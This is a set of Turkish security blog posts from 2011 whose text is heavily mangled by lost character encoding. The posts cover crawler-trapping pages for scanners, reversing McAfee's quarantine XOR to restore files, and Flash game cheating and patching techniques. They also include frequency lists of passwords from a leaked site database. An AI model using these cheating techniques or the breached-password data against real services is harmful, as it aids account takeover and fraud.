Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

